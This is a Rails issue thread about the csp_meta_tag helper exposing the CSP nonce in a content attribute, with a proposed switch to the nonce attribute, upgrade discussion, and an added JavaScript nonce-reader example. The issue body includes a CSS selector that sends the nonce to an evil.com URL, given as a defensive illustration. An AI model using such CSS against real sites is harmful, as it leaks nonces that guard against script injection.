Previously reported via Hackerone, reference #2432937 - Was asked by @tenderlove to create an issue here.
@tvongaza thanks for reporting this! I'm also not clear on how one would go about exploiting / using this information. However, I definitely agree we should fix the attribute name in the meta tag. Would you mind filing an issue in the public tracker, and we can fix it there?
Thank you!
Steps to reproduce
The Rails csp_meta_tag helper generates a meta tag with a content attribute which in theory can have its nonce value exfiltrated.
Example:
Generates:
Which an attacker could access via carefully crafted CSS such as:
While I'm not too sure how this type of attack vector could be exploited, or used (have no working exploit), there seem to be ways to curb it by using the nonce attribute instead of the content attribute for the nonce value, which in most browsers has nonce hiding behaviour.
Example, if we instead generated a meta tag like this:
Then the following would no longer work, as the only way to access the nonce value is via the element.nonce property.
```css
/* this fails, as in CSS nonce will always return an empty string */
meta[nonce~="f7505009ff5f468269b583653293acb5"] {
  background: url("https://evil.com/nonce?f7505009ff5f468269b583653293acb5");
}
```
```js
document.querySelector('meta[name="csp-nonce"]').getAttribute("nonce");
// returns an empty string
document.querySelector('meta[name="csp-nonce"]').nonce;
// returns "f7505009ff5f468269b583653293acb5"
```
More information:
whatwg/html#2369
https://developer.mozilla.org/en-US/docs/Web/HTML/Global_attributes/nonce#accessing_nonces_and_nonce_hiding
Note this would be a breaking change for libraries making use of the csp_meta_tag's content attributes. Examples include (but not limited to):
Impact
Low, not too sure what sort of attack vectors this achieves - others more familiar in this space may be more aware. However, if there is an opportunity to have defence in depth we should take it.
Expected behavior
Nonce value exfiltration should be protected against.
Actual behavior
Nonce value exfiltration is possible.
System configuration
Rails version: HEAD as of April 16, 2024 (commit 1428ef9)
Ruby version: 3.3
I think we should make this change, but I'm not sure what the impact is on existing JS libraries. We're going to have to coordinate fixing Rails along with the corresponding JS libraries. If someone wants to handle that work, I'd really appreciate it!
On the Rails side, I wonder if it would make sense to add a deprecation warning for csp_meta_tag and introduce a csp_nonce_meta_tag with the new behaviour. This would allow for a more graceful upgrade path.
I can take a shot at some PRs, I think the JS libraries can be made backwards compatible by looking for both nonce & content prior to the rails change.
Question: How are the JS files which are included in the Rails source updated? I.e. should I make PRs against both Trix & Rails for the change, or would just against the Trix repo be enough & the changes will be applied to the Rails Trix asset at some point?
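The backwards-compatible reader proposed in the comment above (look for both the nonce and the content attribute), written out as an added example. This is not code from the Rails issue, from Rails, Trix or rails-ujs; the names readCspNonce and makeFakeDocument are chosen here. It also shows the nonce-hiding behaviour the issue body describes: on a browser that hides the nonce, getAttribute("nonce") and CSS attribute selectors see an empty string while the element.nonce property still returns the value. makeFakeDocument is a constructed stand-in for document so the code runs outside a browser; in a real page you pass document itself.

```javascript
// Added example, not code from the Rails issue, Rails, Trix or rails-ujs.
// readCspNonce() and makeFakeDocument() are hypothetical names chosen here.

// Read the CSP nonce from <meta name="csp-nonce">, preferring the nonce
// IDL property (the only handle browsers with nonce hiding expose) and
// falling back to the legacy content="..." attribute that csp_meta_tag
// currently emits, so a library keeps working across the Rails change.
function readCspNonce(doc) {
  const meta = doc.querySelector('meta[name="csp-nonce"]');
  if (!meta) return null;

  // With nonce hiding, meta.getAttribute("nonce") and CSS attribute
  // selectors see "", while meta.nonce still returns the real value.
  if (typeof meta.nonce === "string" && meta.nonce !== "") {
    return meta.nonce;
  }

  // Legacy fallback: tags rendered as <meta name="csp-nonce" content="...">
  const legacy = meta.getAttribute("content");
  return legacy ? legacy : null;
}

// Constructed stand-in for `document` so the example runs outside a
// browser. It models nonce hiding: the nonce is reachable only through
// the .nonce property, never through getAttribute. In a page, pass the
// real `document` to readCspNonce() instead.
function makeFakeDocument({ nonce = "", content = null, present = true } = {}) {
  const meta = {
    nonce, // IDL property, as exposed by browsers
    getAttribute(name) {
      if (name === "nonce") return ""; // hidden from attribute access
      if (name === "content") return content;
      return null;
    },
  };
  return {
    querySelector(selector) {
      return present && selector === 'meta[name="csp-nonce"]' ? meta : null;
    },
  };
}

// Browser usage: const nonce = readCspNonce(document);
```

Because the property is checked first, a library shipping this reader works unchanged before and after Rails switches the helper from content="..." to nonce="...", which is the coordination problem the thread is discussing.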